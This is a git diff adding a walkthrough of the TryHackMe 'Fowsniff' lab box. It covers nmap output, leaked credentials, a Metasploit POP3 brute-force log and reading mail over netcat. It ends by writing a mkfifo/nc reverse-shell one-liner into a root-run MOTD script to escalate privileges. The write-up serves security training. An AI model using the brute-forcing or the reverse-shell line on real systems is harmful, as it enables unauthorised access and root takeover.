diff --git a/Fowsniff.md b/Fowsniff.md new file mode 100644 index 0000000..c0517ef --- /dev/null +++ b/Fowsniff.md @@ -0,0 +1,238 @@ +# TryHackMe-Fowsniff + +>Abdullah Rizwan | 09:56 PM, 17th October 2020 + +## NMAP + +``` +Nmap scan report for 10.10.47.52 +Host is up (0.17s latency). +Not shown: 996 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA) +| 256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA) +|_ 256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519) +80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) +| http-robots.txt: 1 disallowed entry +|_/ +|_http-server-header: Apache/2.4.18 (Ubuntu) +|_http-title: Fowsniff Corp - Delivering Solutions +110/tcp open pop3 Dovecot pop3d +|_pop3-capabilities: CAPA UIDL TOP SASL(PLAIN) PIPELINING AUTH-RESP-CODE RESP-CODES USER +143/tcp open imap Dovecot imapd +|_imap-capabilities: OK listed more SASL-IR have post-login LOGIN-REFERRALS AUTH=PLAINA0001 LITERAL+ capabilities IDLE ENABLE IMAP4rev1 ID Pre-login +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +Nmap done: 1 IP address (1 host up) scanned in 21.12 seconds + +``` + +On the webpage there is a breach of company so we may get thier hacked twitter account + +`https://twitter.com/fowsniffcorp?lang=en` + +On the pastebin we can find a list of possible passwords or user name accounts + +`https://pastebin.com/NrAqVeeX` + + +Users + +``` +mauer@fowsniff +mustikka@fowsniff +tegel@fowsniff +baksteen@fowsniff +seina@fowsniff +stone@fowsniff +mursten@fowsniff +parede@fowsniff +sciana@fowsniff +``` + +Passwords of Md5 + +``` +mailcall +bilbo101 +apples01 +skyler22 +scoobydoo2 +carp4ever +orlando12 +07011972 +``` + +## Metasploit + +``` +msf5 auxiliary(scanner/pop3/pop3_login) > run + +[-] 10.10.47.52:110 - 10.10.47.52:110 - Failed: 'seina:mailcall', '-ERR [AUTH] Authentication failed.' +[!] 10.10.47.52:110 - No active DB -- Credential data will not be saved! +[-] 10.10.47.52:110 - 10.10.47.52:110 - Failed: 'seina:bilbo101', '-ERR [AUTH] Authentication failed.' +[-] 10.10.47.52:110 - 10.10.47.52:110 - Failed: 'seina:apples01', '-ERR [AUTH] Authentication failed.' +[-] 10.10.47.52:110 - 10.10.47.52:110 - Failed: 'seina:skyler22', '' +[+] 10.10.47.52:110 - 10.10.47.52:110 - Success: 'seina:scoobydoo2' '+OK Logged in. ' +[*] 10.10.47.52:110 - Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed + +``` +`scoobydoo2` + + +## POP3 + +Now to use pop3 which is email protocol through command line + +`nc 10.10.47.52 110` + +This will connect to protocol + +``` +USER seina +PASS scoobydoo2 +``` + +There are two mails +``` +root@kali:~# nc 10.10.47.52 110 ++OK Welcome to the Fowsniff Corporate Mail Server! +USER seina ++OK +PASS scoobydoo2 ++OK Logged in. +STAT ++OK 2 2902 +LIST ++OK 2 messages: +1 1622 +2 1280 +. +RETR +-ERR Invalid message number: +RETR 1 ++OK 1622 octets +Return-Path: +X-Original-To: seina@fowsniff +Delivered-To: seina@fowsniff +Received: by fowsniff (Postfix, from userid 1000) + id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT) +To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff, + mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff, + tegel@fowsniff +Subject: URGENT! Security EVENT! +Message-Id: <20180313185107.0FA3916A@fowsniff> +Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT) +From: stone@fowsniff (stone) + +Dear All, + +A few days ago, a malicious actor was able to gain entry to +our internal email systems. The attacker was able to exploit +incorrectly filtered escape characters within our SQL database +to access our login credentials. Both the SQL and authentication +system used legacy methods that had not been updated in some time. + +We have been instructed to perform a complete internal system +overhaul. While the main systems are "in the shop," we have +moved to this isolated, temporary server that has minimal +functionality. + +This server is capable of sending and receiving emails, but only +locally. That means you can only send emails to other users, not +to the world wide web. You can, however, access this system via +the SSH protocol. + +The temporary password for SSH is "S1ck3nBluff+secureshell" + +You MUST change this password as soon as possible, and you will do so under my +guidance. I saw the leak the attacker posted online, and I must say that your +passwords were not very secure. + +Come see me in my office at your earliest convenience and we'll set it up. + +Thanks, +A.J Stone +. +``` + +``` +OK 1280 octets +Return-Path: +X-Original-To: seina@fowsniff +Delivered-To: seina@fowsniff +Received: by fowsniff (Postfix, from userid 1004) + id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT) +To: seina@fowsniff +Subject: You missed out! +Message-Id: <20180313185405.101CA1AC2@fowsniff> +Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT) +From: baksteen@fowsniff + +Devin, + +You should have seen the brass lay into AJ today! +We are going to be talking about this one for a looooong time hahaha. +Who knew the regional manager had been in the navy? She was swearing like a sailor! + +I don't know what kind of pneumonia or something you brought back with +you from your camping trip, but I think I'm coming down with it myself. +How long have you been gone - a week? +Next time you're going to get sick and miss the managerial blowout of the century, +at least keep it to yourself! + +I'm going to head home early and eat some chicken soup. +I think I just got an email from Stone, too, but it's probably just some +"Let me explain the tone of my meeting with management" face-saving mail. +I'll read it when I get back. + +Feel better, + +Skyler + +PS: Make sure you change your email password. +AJ had been telling us to do that right before Captain Profanity showed up. + +. + + +``` + +We can ssh into box with username `baksteen` password `S1ck3nBluff+secureshell` + + + +## SSH + +After logging with SSH we are in and now let's find some files + +``` +baksteen@fowsniff:/$ id +uid=1004(baksteen) gid=100(users) groups=100(users),1001(baksteen) +baksteen@fowsniff:/$ find / -group users 2>/dev/null +/opt/cube/cube.sh +/run/user/1004 +/run/user/1004/systemd +/run/user/1004/systemd/private +/run/user/1004/systemd/notify +/home/baksteen/.cache +/home/baksteen/.cache/motd.legal-displayed +/home/baksteen/Maildir +/home/baksteen/Maildir/tmp +/home/baksteen/Maildir/dovecot-uidvalidity +/home/baksteen/Maildir/dovecot.index.log + +``` + +Here we can see cube.sh + +nano cube.sh and paste it in +`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.94.60 5555 >/tmp/f` + +start nc listener nc -lvp 5555 + +Logout from the machine and log in back since it's a message of the day file it will run as root when you login to display message and your listener will capture it. \ No newline at end of file